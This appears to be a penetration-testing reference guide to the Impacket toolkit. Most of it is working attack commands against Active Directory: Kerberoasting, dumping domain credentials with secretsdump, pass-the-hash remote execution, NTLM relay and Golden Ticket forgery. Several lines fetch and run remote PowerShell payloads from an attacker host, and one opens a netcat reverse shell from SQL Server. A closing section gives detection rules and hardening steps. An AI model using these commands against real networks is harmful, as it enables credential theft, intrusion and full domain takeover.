
Impacket Toolkit Mastery: Essential Tool for Active Directory Attacks
Comprehensive reference guide to the Impacket toolkit covering essential tools like GetUserSPNs, secretsdump, psexec, ntlmrelayx, and more for AD penetration testing.
Introduction
Impacket is a collection of Python classes for working with network protocols, developed by SecureAuth Corporation (now part of Fortra). It has become the de facto standard toolkit for Active Directory penetration testing, providing pure Python implementations of numerous network protocols including SMB, MSRPC, LDAP, Kerberos, and more.
The toolkit's power lies in its comprehensive protocol support and ease of use. Unlike compiled exploits that require specific environments or architectures, Impacket scripts run anywhere Python is installed, making them ideal for both Linux-based penetration testing and cross-platform red team operations.
Impacket is essential for modern Active Directory assessments because it provides:
- Credential dumping from domain controllers and workstations
- Remote code execution via multiple protocols (SMB, WMI, DCOM)
- Kerberos attacks including Kerberoasting and AS-REP roasting
- NTLM relay and authentication abuse
- Lateral movement techniques across Windows networks
- Domain enumeration without requiring Windows-specific tools
Red Team Essential
Impacket has become so integral to penetration testing that it's pre-installed on all major security distributions (Kali Linux, Parrot OS, BlackArch). Many modern attack frameworks like CrackMapExec and BloodHound rely on Impacket libraries under the hood.
Installation and Setup
Installing Impacket
From Package Manager (Recommended):
# Kali Linux / Debian-based
sudo apt update
sudo apt install impacket-scripts python3-impacket
# Arch Linux
sudo pacman -S impacket
# Verify installation
impacket-psexec --help
From GitHub (Latest Version):
# Clone repository
git clone https://github.com/fortra/impacket.git
cd impacket
# Install from the cloned source (add -e for an editable, development-mode install)
pip3 install .
# Alternative: Install with pipx (isolated environment)
pipx install impacket
Using Virtual Environment:
# Create isolated environment
python3 -m venv impacket-env
source impacket-env/bin/activate
# Install Impacket
pip install impacket
# Verify
python3 -c "import impacket; print(impacket.__version__)"
Environment Setup
Configure for Penetration Testing:
# Set up working directory
mkdir -p ~/pentests/tools/impacket
cd ~/pentests/tools/impacket
# Create alias shortcuts (add to ~/.bashrc or ~/.zshrc)
cat >> ~/.bashrc << 'EOF'
# Impacket aliases
alias imp-psexec='impacket-psexec'
alias imp-smbexec='impacket-smbexec'
alias imp-wmiexec='impacket-wmiexec'
alias imp-secrets='impacket-secretsdump'
alias imp-GetUserSPNs='impacket-GetUserSPNs'
alias imp-GetNPUsers='impacket-GetNPUsers'
alias imp-ntlmrelayx='impacket-ntlmrelayx'
alias imp-smbserver='impacket-smbserver'
EOF
source ~/.bashrc
Core Authentication Tools
GetUserSPNs - Kerberoasting
Description: Enumerate and request Kerberos TGS tickets for service accounts (Kerberoasting attack).
Basic Usage:
# Enumerate SPNs and request tickets
impacket-GetUserSPNs DOMAIN.LOCAL/username:password -dc-ip 10.10.11.10 -request
# Output to hashcat format
impacket-GetUserSPNs DOMAIN.LOCAL/username:password -dc-ip 10.10.11.10 -request -outputfile hashes.txt
# Use hash instead of password
impacket-GetUserSPNs DOMAIN.LOCAL/username -hashes :NTHASH -dc-ip 10.10.11.10 -request
Advanced Techniques:
# Target specific user
impacket-GetUserSPNs DOMAIN.LOCAL/username:password -dc-ip 10.10.11.10 -request-user svc_sql
# Use Kerberos authentication (requires TGT)
export KRB5CCNAME=/tmp/krb5cc_ticket
impacket-GetUserSPNs DOMAIN.LOCAL/username -k -no-pass -dc-ip 10.10.11.10 -request
# Save tickets to file
impacket-GetUserSPNs DOMAIN.LOCAL/username:password -dc-ip 10.10.11.10 -request -save
# Stealth mode - enumerate only, no ticket requests
impacket-GetUserSPNs DOMAIN.LOCAL/username:password -dc-ip 10.10.11.10
Example Output:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------------------------- ---------- -------- -------------------------- --------- ----------
MSSQLSvc/sql01.domain.local:1433 svc_sql 2025-01-15 08:32:12.394221 <never>
HTTP/web01.domain.local svc_web 2024-11-23 14:21:33.182745 <never>
$krb5tgs$23$*svc_sql$DOMAIN.LOCAL$MSSQLSvc/sql01.domain.local:1433*$a8d3b2...
GetNPUsers - AS-REP Roasting
Description: Request AS-REP responses for users that don't require Kerberos pre-authentication.
Basic Usage:
# Enumerate vulnerable users
impacket-GetNPUsers DOMAIN.LOCAL/ -dc-ip 10.10.11.10 -usersfile users.txt -format hashcat
# Single user check
impacket-GetNPUsers DOMAIN.LOCAL/username -no-pass -dc-ip 10.10.11.10
# Request AS-REP for specific user
impacket-GetNPUsers DOMAIN.LOCAL/ -dc-ip 10.10.11.10 -request -usersfile vulnerable_users.txt
Advanced Options:
# Output to John format
impacket-GetNPUsers DOMAIN.LOCAL/ -dc-ip 10.10.11.10 -usersfile users.txt -format john -outputfile asrep_hashes.txt
# Enumerate domain users automatically
impacket-GetNPUsers DOMAIN.LOCAL/username:password -dc-ip 10.10.11.10 -request
# Use with LDAP
impacket-GetNPUsers DOMAIN.LOCAL/username:password -dc-ip 10.10.11.10 -ldapfilter "(userAccountControl:1.2.840.113556.1.4.803:=4194304)"
secretsdump - Credential Extraction
Description: Dump secrets from local SAM, LSA, NTDS.dit, and cached credentials.
SAM Database Dumping:
# Dump local SAM (workstation/server)
impacket-secretsdump administrator:[email protected]
# With NTLM hash
impacket-secretsdump -hashes :NTHASH [email protected]
# Specify specific user
impacket-secretsdump DOMAIN/username:[email protected] -just-dc-user administrator
Domain Controller Credential Dumping:
# Dump NTDS.dit from Domain Controller
impacket-secretsdump DOMAIN.LOCAL/administrator:[email protected] -just-dc
# Extract NTLM hashes only
impacket-secretsdump DOMAIN.LOCAL/administrator:[email protected] -just-dc-ntlm
# Dump specific user
impacket-secretsdump DOMAIN.LOCAL/administrator:[email protected] -just-dc-user krbtgt
# Include historical passwords
impacket-secretsdump DOMAIN.LOCAL/administrator:[email protected] -history
# Use Kerberos authentication
export KRB5CCNAME=/tmp/admin.ccache
impacket-secretsdump DOMAIN.LOCAL/[email protected] -k -no-pass -just-dc
Advanced Techniques:
# VSS (Volume Shadow Copy) method
impacket-secretsdump DOMAIN.LOCAL/administrator:[email protected] -use-vss
# Extract from specific NTDS.dit file
impacket-secretsdump -ntds /path/to/ntds.dit -system /path/to/SYSTEM LOCAL
# Export to specific format
impacket-secretsdump DOMAIN.LOCAL/administrator:[email protected] -outputfile dc_secrets
# Extract Kerberos keys
impacket-secretsdump DOMAIN.LOCAL/administrator:[email protected] -just-dc-user krbtgt -output krbtgt_keys
Example Output:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a9b30e5b0dc865eadcea9411e4ade72d:::
DOMAIN$:1000:aad3b435b51404eeaad3b435b51404ee:8a4c9b5d2e3f7a1b0c9d8e7f6a5b4c3d:::
Remote Execution Tools
psexec - SMB-based Remote Execution
Description: Execute commands on remote systems via SMB, similar to Windows PsExec.
Basic Execution:
# Execute with credentials
impacket-psexec DOMAIN/administrator:[email protected]
# Use NTLM hash (Pass-the-Hash)
impacket-psexec -hashes :NTHASH [email protected]
# Execute specific command
impacket-psexec DOMAIN/administrator:[email protected] 'ipconfig /all'
Advanced Options:
# Upload and execute binary
impacket-psexec DOMAIN/administrator:[email protected] -c /tmp/payload.exe
# Use alternative service name (stealth)
impacket-psexec DOMAIN/administrator:[email protected] -service-name svchost
# Execute in specific share
impacket-psexec DOMAIN/administrator:[email protected] -share ADMIN$
# Use Kerberos authentication
export KRB5CCNAME=/tmp/admin.ccache
impacket-psexec DOMAIN/[email protected] -k -no-pass
# Remote binary execution
impacket-psexec DOMAIN/administrator:[email protected] -remote-binary-name update.exe
smbexec - Stealthier SMB Execution
Description: Execute commands via SMB without uploading a service binary (stealthier than psexec).
Basic Usage:
# Standard execution
impacket-smbexec DOMAIN/administrator:[email protected]
# Pass-the-Hash
impacket-smbexec -hashes :NTHASH [email protected]
# Execute command without interactive shell
impacket-smbexec DOMAIN/administrator:[email protected] -mode SERVER 'whoami'
Stealth Techniques:
# Use SHARE mode (writes to writable share)
impacket-smbexec DOMAIN/administrator:[email protected] -mode SHARE
# Specify custom share
impacket-smbexec DOMAIN/administrator:[email protected] -share C$
# Silent execution (no output capture)
impacket-smbexec DOMAIN/administrator:[email protected] -nooutput
wmiexec - WMI-based Execution
Description: Execute commands via Windows Management Instrumentation (more stealthy, no service creation).
Basic Usage:
# Standard WMI execution
impacket-wmiexec DOMAIN/administrator:[email protected]
# Pass-the-Hash
impacket-wmiexec -hashes :NTHASH [email protected]
# Execute specific command
impacket-wmiexec DOMAIN/administrator:[email protected] 'tasklist'
Advanced Techniques:
# Silent execution (no output)
impacket-wmiexec DOMAIN/administrator:[email protected] -nooutput -c 'powershell -c "IEX(New-Object Net.WebClient).DownloadString(\"http://10.10.14.5/payload.ps1\")"'
# Use specific namespace
impacket-wmiexec DOMAIN/administrator:[email protected] -namespace root/cimv2
# Execute PowerShell command
impacket-wmiexec DOMAIN/administrator:[email protected] 'powershell -c "Get-Process"'
# Use Kerberos
export KRB5CCNAME=/tmp/admin.ccache
impacket-wmiexec DOMAIN/[email protected] -k -no-pass
atexec - Task Scheduler Execution
Description: Execute commands via Windows Task Scheduler (useful when SMB/WMI are restricted).
Usage:
# Basic execution
impacket-atexec DOMAIN/administrator:[email protected] 'whoami'
# Schedule task for specific time
impacket-atexec DOMAIN/administrator:[email protected] -at 14:30 'cmd.exe /c calc.exe'
# Pass-the-Hash
impacket-atexec -hashes :NTHASH [email protected] 'systeminfo'
# Silent background execution
impacket-atexec DOMAIN/administrator:[email protected] 'powershell -c "Start-Process calc.exe"'
dcomexec - DCOM-based Execution
Description: Execute commands via Distributed Component Object Model.
Usage:
# Standard DCOM execution
impacket-dcomexec DOMAIN/administrator:[email protected]
# Specify DCOM object (default: MMC20.Application)
impacket-dcomexec DOMAIN/administrator:[email protected] -object ShellWindows
# Pass-the-Hash
impacket-dcomexec -hashes :NTHASH [email protected] 'cmd.exe'
NTLM Relay and Authentication
ntlmrelayx - NTLM Relay Attack Framework
Description: Relay NTLM authentication to target systems for exploitation.
Basic Relay:
# Basic relay to target list
impacket-ntlmrelayx -tf targets.txt -smb2support
# Relay with command execution
impacket-ntlmrelayx -tf targets.txt -smb2support -c 'whoami'
# Dump SAM database
impacket-ntlmrelayx -tf targets.txt -smb2support
Advanced Relay Techniques:
# Interactive SMB shell
impacket-ntlmrelayx -tf targets.txt -smb2support -i
# SOCKS proxy for tunneling
impacket-ntlmrelayx -tf targets.txt -smb2support -socks
# Relay to specific protocol (LDAP)
impacket-ntlmrelayx -t ldap://dc01.domain.local -smb2support
# Relay and dump Domain Admin hashes
impacket-ntlmrelayx -t ldap://dc01.domain.local -smb2support --dump-adcs
# Relay to HTTP
impacket-ntlmrelayx -t http://web01.domain.local/endpoint -smb2support
# Execute PowerShell payload
impacket-ntlmrelayx -tf targets.txt -smb2support -c 'powershell -c "IEX(New-Object Net.WebClient).DownloadString(\"http://10.10.14.5/shell.ps1\")"'
LDAP Relay for Privilege Escalation:
# Create new Domain Admin account
impacket-ntlmrelayx -t ldaps://dc01.domain.local -smb2support --add-computer
# Delegate permissions (RBCD attack)
impacket-ntlmrelayx -t ldaps://dc01.domain.local -smb2support --delegate-access
# Extract LAPS passwords
impacket-ntlmrelayx -t ldaps://dc01.domain.local -smb2support --dump-laps
HTTP Relay:
# Start HTTP server and relay
impacket-ntlmrelayx -t smb://10.10.11.45 -smb2support
# Relay from HTTP to SMB
impacket-ntlmrelayx -t smb://10.10.11.45 -smb2support -e /tmp/payload.exe
# WebDAV relay
impacket-ntlmrelayx -t http://sharepoint.domain.local -smb2support
Kerberos Tools
getST - Request Service Tickets
Description: Request Kerberos service tickets for specific SPNs.
Usage:
# Request service ticket
impacket-getST DOMAIN.LOCAL/username:password -spn MSSQLSvc/sql01.domain.local:1433
# Use TGT to request ticket
export KRB5CCNAME=/tmp/user.ccache
impacket-getST DOMAIN.LOCAL/username -k -no-pass -spn HTTP/web01.domain.local
# Request ticket with AES key
impacket-getST DOMAIN.LOCAL/username -aesKey <AES256_KEY> -spn CIFS/file01.domain.local
# Impersonate user (S4U2Self)
impacket-getST DOMAIN.LOCAL/username:password -spn CIFS/dc01.domain.local -impersonate administrator
ticketConverter - Convert Ticket Formats
Description: Convert between different Kerberos ticket formats (ccache, kirbi).
Usage:
# Convert kirbi to ccache
impacket-ticketConverter ticket.kirbi ticket.ccache
# Convert ccache to kirbi
impacket-ticketConverter ticket.ccache ticket.kirbi
# Use converted ticket
export KRB5CCNAME=ticket.ccache
impacket-psexec DOMAIN.LOCAL/[email protected] -k -no-pass
getTGT - Request Ticket Granting Tickets
Description: Request TGT for a user account.
Usage:
# Request TGT with password
impacket-getTGT DOMAIN.LOCAL/username:password
# Request TGT with NTLM hash
impacket-getTGT DOMAIN.LOCAL/username -hashes :NTHASH
# Request TGT with AES key
impacket-getTGT DOMAIN.LOCAL/username -aesKey <AES256_KEY>
# Save to specific file
impacket-getTGT DOMAIN.LOCAL/username:password -dc-ip 10.10.11.10 -save username.ccache
Network Services
smbserver - SMB File Server
Description: Create a simple SMB server for file transfers.
Basic Usage:
# Create anonymous SMB share
impacket-smbserver share /tmp/share
# Create authenticated share
impacket-smbserver share /tmp/share -smb2support -username user -password password
# Listen on specific interface
impacket-smbserver share /tmp/share -smb2support -ip 10.10.14.5
Windows Client Commands:
# Map network drive
net use Z: \\10.10.14.5\share /user:user password
# Copy files to share
copy C:\Windows\System32\config\SAM Z:\
# Execute from share
\\10.10.14.5\share\payload.exe
smbclient - SMB Client
Description: Connect to SMB shares and perform file operations.
Basic Usage:
# Connect to share
impacket-smbclient DOMAIN/username:[email protected]
# List shares
impacket-smbclient -L //10.10.11.45 -U username
# Download file
impacket-smbclient DOMAIN/username:[email protected] -c 'get passwords.txt'
# Upload file
impacket-smbclient DOMAIN/username:[email protected] -c 'put payload.exe'
mssqlclient - MSSQL Client
Description: Connect to Microsoft SQL Server instances.
Basic Connection:
# Connect with credentials
impacket-mssqlclient DOMAIN/username:[email protected]
# Windows authentication
impacket-mssqlclient DOMAIN/username:[email protected] -windows-auth
# Pass-the-Hash
impacket-mssqlclient -hashes :NTHASH [email protected] -windows-auth
SQL Server Exploitation:
# Connect to MSSQL
impacket-mssqlclient sa:[email protected]
# Enable xp_cmdshell
SQL> enable_xp_cmdshell
# Execute OS commands
SQL> xp_cmdshell whoami
# Read file
SQL> xp_cmdshell type C:\Users\Administrator\Desktop\flag.txt
# Upload file via SMB
SQL> xp_cmdshell powershell -c "IWR -Uri http://10.10.14.5/nc.exe -OutFile C:\temp\nc.exe"
# Reverse shell
SQL> xp_cmdshell C:\temp\nc.exe 10.10.14.5 4444 -e cmd.exe
Enumeration Tools
samrdump - SAM Enumeration
Description: Enumerate users via SAM RPC protocol.
Usage:
# Enumerate via port 445
impacket-samrdump DOMAIN/username:[email protected]
# Enumerate via port 139
impacket-samrdump DOMAIN/username:[email protected] 139/SMB
# Anonymous enumeration
impacket-samrdump @10.10.11.45
rpcdump - RPC Endpoint Mapping
Description: Enumerate RPC endpoints on target systems.
Usage:
# Dump RPC endpoints (port 135)
impacket-rpcdump DOMAIN/username:[email protected] 135
# Dump via SMB (port 445)
impacket-rpcdump DOMAIN/username:[email protected] 445
# Enumerate specific interface
impacket-rpcdump DOMAIN/username:[email protected] -brute-opnums
reg - Remote Registry Access
Description: Query and modify remote Windows Registry.
Usage:
# Query registry key
impacket-reg DOMAIN/username:[email protected] query -keyName HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion
# Read specific value
impacket-reg DOMAIN/username:[email protected] query -keyName "HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters" -v "NullSessionShares"
# Add registry key
impacket-reg DOMAIN/username:[email protected] add -keyName "HKLM\\SOFTWARE\\Test" -v TestValue -vd "TestData" -vt REG_SZ
# Delete registry key
impacket-reg DOMAIN/username:[email protected] delete -keyName "HKLM\\SOFTWARE\\Test"
Practical Attack Scenarios
Scenario 1: Initial Domain Compromise
# Step 1: Enumerate users (null session)
impacket-GetNPUsers DOMAIN.LOCAL/ -dc-ip 10.10.11.10 -usersfile users.txt -format hashcat -outputfile asrep_hashes.txt
# Step 2: Crack AS-REP hashes
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt
# Step 3: Kerberoast with compromised credentials
impacket-GetUserSPNs DOMAIN.LOCAL/user:password -dc-ip 10.10.11.10 -request -outputfile spn_hashes.txt
# Step 4: Crack Kerberoast hashes
hashcat -m 13100 spn_hashes.txt /usr/share/wordlists/rockyou.txt --rules-file /usr/share/hashcat/rules/best64.rule
# Step 5: Dump credentials with compromised service account
impacket-secretsdump DOMAIN.LOCAL/svc_sql:[email protected] -just-dc
Scenario 2: Lateral Movement
# Step 1: Verify credentials across multiple hosts
crackmapexec smb 10.10.11.0/24 -u administrator -H <NTLM_HASH> --continue-on-success
# Step 2: Execute commands on reachable hosts
impacket-wmiexec -hashes :<NTLM_HASH> [email protected] 'ipconfig /all'
# Step 3: Dump local SAM on each host
impacket-secretsdump -hashes :<NTLM_HASH> [email protected]
# Step 4: Move to next target with obtained credentials
impacket-psexec DOMAIN/newuser:[email protected]
Scenario 3: NTLM Relay Attack
# Step 1: Configure Responder
sed -i 's/SMB = On/SMB = Off/g' /etc/responder/Responder.conf
sed -i 's/HTTP = On/HTTP = Off/g' /etc/responder/Responder.conf
# Step 2: Start Responder
sudo responder -I eth0 -wv
# Step 3: Setup ntlmrelayx (separate terminal)
impacket-ntlmrelayx -tf targets.txt -smb2support -socks
# Step 4: Trigger authentication (social engineering, forced browsing, etc.)
# UNC path: \\attacker-ip\share
# Step 5: Use SOCKS proxy for authentication
proxychains impacket-secretsdump DOMAIN/[email protected]
Scenario 4: Domain Controller Compromise
# Step 1: Verify Domain Admin credentials
impacket-psexec DOMAIN/Administrator:[email protected] 'whoami'
# Step 2: Dump NTDS.dit
impacket-secretsdump DOMAIN/Administrator:[email protected] -just-dc -outputfile dc_dump
# Step 3: Extract krbtgt hash for Golden Ticket
grep krbtgt dc_dump.ntds
# Step 4: Create Golden Ticket
impacket-ticketer -nthash <KRBTGT_HASH> -domain-sid <DOMAIN_SID> -domain DOMAIN.LOCAL administrator
# Step 5: Use Golden Ticket
export KRB5CCNAME=administrator.ccache
impacket-psexec DOMAIN.LOCAL/[email protected] -k -no-pass
Defensive Detection
Detecting Impacket Usage
Network Signatures:
# Snort rule for Impacket PsExec (keys on the SMB1 header magic at offset 4 and the svcctl pipe name;
# SMB2 sessions, which Impacket negotiates with -smb2support, do not carry the |ff|SMB magic and need a separate rule)
alert tcp any any -> any 445 (msg:"Impacket PsExec Service Creation"; content:"|ff|SMB"; offset:4; depth:4; content:"svcctl"; nocase; sid:1000001;)
# Zeek detection
# Look for unusual SMB service names (common with psexec)
redef enum Notice::Type += { Suspicious_SMB_Pipe };
# Zeek raises smb2_create_request for every SMB2 CREATE; request$filename is the file or pipe being opened
event smb2_create_request(c: connection, hdr: SMB2::Header, request: SMB2::CreateRequest)
    {
    if ( /^(PSEXESVC|BTOBTO|REMCOM)/ in request$filename )
        NOTICE([$note=Suspicious_SMB_Pipe, $msg="Possible PsExec execution", $conn=c]);
    }
Windows Event Logs:
# Event ID 4688: Process Creation (CommandLine is Properties[8]; requires the
# "Include command line in process creation events" audit policy)
# smbexec/wmiexec run cmd.exe and redirect output to ADMIN$ over the loopback address
Get-WinEvent -FilterHashtable @{LogName='Security';ID=4688} |
Where-Object {$_.Properties[8].Value -match 'cmd\.exe.*\\\\127\.0\.0\.1'} |
Select-Object TimeCreated, @{N='CommandLine';E={$_.Properties[8].Value}}
# Event ID 5145: Detailed File Share access (ShareName is Properties[7], RelativeTargetName is Properties[9])
# Monitor for __output file creation (used by smbexec/wmiexec)
Get-WinEvent -FilterHashtable @{LogName='Security';ID=5145} |
Where-Object {$_.Properties[9].Value -match '__output|__ADMIN'} |
Select-Object TimeCreated, @{N='Share';E={$_.Properties[7].Value}}, @{N='Target';E={$_.Properties[9].Value}}
# Event ID 4697: Service Installation (ServiceName is Properties[4], ServiceFileName is Properties[5])
# Detect PsExec-style service creation, by known name or by a binary dropped into ADMIN$
Get-WinEvent -FilterHashtable @{LogName='Security';ID=4697} |
Where-Object {$_.Properties[4].Value -match 'PSEXESVC|BTOBTO' -or $_.Properties[5].Value -match '\\ADMIN\$\\'} |
Select-Object TimeCreated, @{N='Service';E={$_.Properties[4].Value}}, @{N='Path';E={$_.Properties[5].Value}}
Sigma Rules:
title: Impacket PsExec Execution
status: experimental
description: Detects PsExec-like execution using Impacket
references:
  - https://github.com/fortra/impacket
tags:
  - attack.execution
  - attack.t1569.002
logsource:
  product: windows
  service: security
detection:
  selection_service:
    EventID: 4697
    ServiceFileName|contains:
      - '\ADMIN$\'
      - 'PSEXESVC'
  condition: selection_service
falsepositives:
  - Legitimate administrative tools
level: high
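To exercise the three Windows Event Log queries and the Sigma rule above without a live domain, here is an added Python example (not part of the original page or of Impacket itself) that applies the same patterns to constructed Security-log records. The property indexes it uses (4688 CommandLine=8, 5145 ShareName=7 and RelativeTargetName=9, 4697 ServiceName=4 and ServiceFileName=5) are the standard Security log template positions; treating wmiexec's `__<timestamp>` output files as an artifact alongside `__output` is an assumption that goes slightly beyond the page's match.

```python
"""Host-side detection of the Impacket execution artifacts covered above
(4688 loopback redirection, 5145 __output files, 4697 PsExec-style services),
run over constructed Security-log records rather than real telemetry."""
import re
from dataclasses import dataclass

# Each record mirrors Get-WinEvent: "Properties" is keyed by the index used in
# $_.Properties[n].Value (4688 CommandLine=8, 5145 ShareName=7 / RelativeTargetName=9,
# 4697 ServiceName=4 / ServiceFileName=5). Every value below is constructed.
SAMPLE_EVENTS = [
    # wmiexec/smbexec: cmd.exe output redirected to ADMIN$ over loopback
    {"EventID": 4688, "Properties": {8: r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1700000000.12 2>&1"}},
    # benign process creation
    {"EventID": 4688, "Properties": {8: r"cmd.exe /c ipconfig /all"}},
    # smbexec writes its output file into the share it was told to use
    {"EventID": 5145, "Properties": {7: r"\\*\C$", 9: r"__output"}},
    # ordinary file-share access
    {"EventID": 5145, "Properties": {7: r"\\*\C$", 9: r"Users\alice\report.docx"}},
    # classic Impacket psexec service name
    {"EventID": 4697, "Properties": {4: "BTOBTO", 5: r"%SystemRoot%\BTOBTO.exe"}},
    # randomised service name, but the binary lives in ADMIN$ (the Sigma rule's case)
    {"EventID": 4697, "Properties": {4: "vGhTyUiO", 5: r"\\127.0.0.1\ADMIN$\vGhTyUiO.exe"}},
    # legitimate service installation
    {"EventID": 4697, "Properties": {4: "Sense", 5: r"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"}},
]

# Patterns taken from the PowerShell queries and Sigma rule in this section.
# PowerShell's -match is case-insensitive, so IGNORECASE keeps behaviour identical.
CMDLINE_LOOPBACK = re.compile(r"cmd\.exe.*\\\\127\.0\.0\.1", re.IGNORECASE)
SHARE_ARTIFACT = re.compile(r"^__(output|\d+)", re.IGNORECASE)  # __output or __<timestamp> (assumed)
SERVICE_NAME = re.compile(r"PSEXESVC|BTOBTO|REMCOM", re.IGNORECASE)
SERVICE_PATH = re.compile(r"\\ADMIN\$\\|PSEXESVC", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    event_id: int
    rule: str
    evidence: str


def evaluate(event):
    """Return the findings one Security event triggers (empty list if none)."""
    eid, props = event["EventID"], event["Properties"]
    findings = []
    if eid == 4688:
        cmd = props.get(8, "")
        if CMDLINE_LOOPBACK.search(cmd):
            findings.append(Finding(eid, "loopback-admin-share-redirect", cmd))
    elif eid == 5145:
        target = props.get(9, "")
        if SHARE_ARTIFACT.search(target):
            findings.append(Finding(eid, "impacket-output-file", f"{props.get(7, '')}\\{target}"))
    elif eid == 4697:
        name, path = props.get(4, ""), props.get(5, "")
        if SERVICE_NAME.search(name) or SERVICE_PATH.search(path):
            findings.append(Finding(eid, "psexec-style-service", f"{name} -> {path}"))
    return findings


def scan(events):
    """Evaluate every record and collect the findings in log order."""
    return [f for event in events for f in evaluate(event)]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.event_id}] {f.rule}: {f.evidence}")
```

Records exported with `Get-WinEvent | ConvertTo-Json` can be reshaped into the same `EventID`/`Properties` form to run the rules over real logs.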
Mitigation Strategies
SMB Hardening:
# Enable SMB signing (required)
Set-SmbServerConfiguration -RequireSecuritySignature $True -Force
# Disable SMBv1
Set-SmbServerConfiguration -EnableSMB1Protocol $False -Force
# Enable SMB encryption
Set-SmbServerConfiguration -EncryptData $True -Force
Credential Protection:
# Enable Credential Guard
# Requires Windows 10 Enterprise/Server 2016+
# Set via Group Policy: Computer Configuration > Administrative Templates > System > Device Guard
# Enable LSASS Protection (PPL)
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "RunAsPPL" -Value 1
# Restrict NTLM: level 5 sends NTLMv2 only and refuses LM and NTLMv1 (NTLMv2 is still accepted;
# blocking NTLM entirely is done through the "Network security: Restrict NTLM" policies)
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "LmCompatibilityLevel" -Value 5
Network Segmentation:
# Block SMB at the perimeter firewall (drop anything not from the internal 10.0.0.0/8 range)
iptables -A INPUT -p tcp --dport 445 ! -s 10.0.0.0/8 -j DROP
iptables -A INPUT -p tcp --dport 139 ! -s 10.0.0.0/8 -j DROP
# Restrict access to the RPC endpoint mapper
iptables -A INPUT -p tcp --dport 135 ! -s 10.0.0.0/8 -j DROP
Best Practices for Penetration Testers
Operational Security
# Use Kerberos authentication when possible (stealthier)
export KRB5CCNAME=/tmp/ticket.ccache
impacket-wmiexec DOMAIN/[email protected] -k -no-pass
# Avoid creating easily detectable service names
impacket-psexec DOMAIN/admin:pass@target -service-name svchost
# Use authenticated encryption for Kerberos
impacket-getST DOMAIN/user:pass -spn HTTP/target -aesKey <AES256_KEY>
# Clean up artifacts
impacket-psexec DOMAIN/admin:pass@target 'del C:\Windows\Temp\*.exe'
Documentation and Reporting
# Log all Impacket commands
script -a impacket_session.log
# Save all output to files
impacket-secretsdump DOMAIN/admin:pass@dc | tee secretsdump_output.txt
# Generate timestamp for each command
echo "[$(date '+%Y-%m-%d %H:%M:%S')] Running secretsdump..." >> audit.log
References
MITRE ATT&CK Techniques
- T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting - GetUserSPNs
- T1558.004 - Steal or Forge Kerberos Tickets: AS-REP Roasting - GetNPUsers
- T1003.003 - OS Credential Dumping: NTDS - secretsdump (DCSync)
- T1003.002 - OS Credential Dumping: Security Account Manager - secretsdump (SAM)
- T1569.002 - System Services: Service Execution - psexec/smbexec
- T1047 - Windows Management Instrumentation - wmiexec
- T1557.001 - Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning - ntlmrelayx
- T1550.002 - Use Alternate Authentication Material: Pass the Hash - PtH attacks
- T1550.003 - Use Alternate Authentication Material: Pass the Ticket - Kerberos ticket usage
MITRE ATT&CK Software
- S0357 - Impacket - Official ATT&CK software entry
Official Documentation
- Impacket GitHub Repository - Source code
- Impacket Documentation - SecureAuth docs
Security Resources
- HackTricks: Impacket Usage - Attack techniques
Next Steps
After mastering Impacket:
- Practice in controlled lab environments (Active Directory lab, HackTheBox, TryHackMe)
- Combine with other tools like CrackMapExec, BloodHound, and Rubeus
- Understand defensive detection mechanisms for responsible disclosure
- Develop custom scripts using Impacket libraries for specialized attacks
- Explore related Active Directory attack techniques:
Takeaway: Impacket is the cornerstone toolkit for Active Directory penetration testing, providing comprehensive protocol implementations for every stage of an assessment from initial enumeration to post-exploitation. Mastering Impacket tools like GetUserSPNs, secretsdump, psexec, and ntlmrelayx is essential for any security professional working with Windows environments. Always use these powerful tools responsibly with proper authorization, and understand defensive detection mechanisms to provide comprehensive security assessments.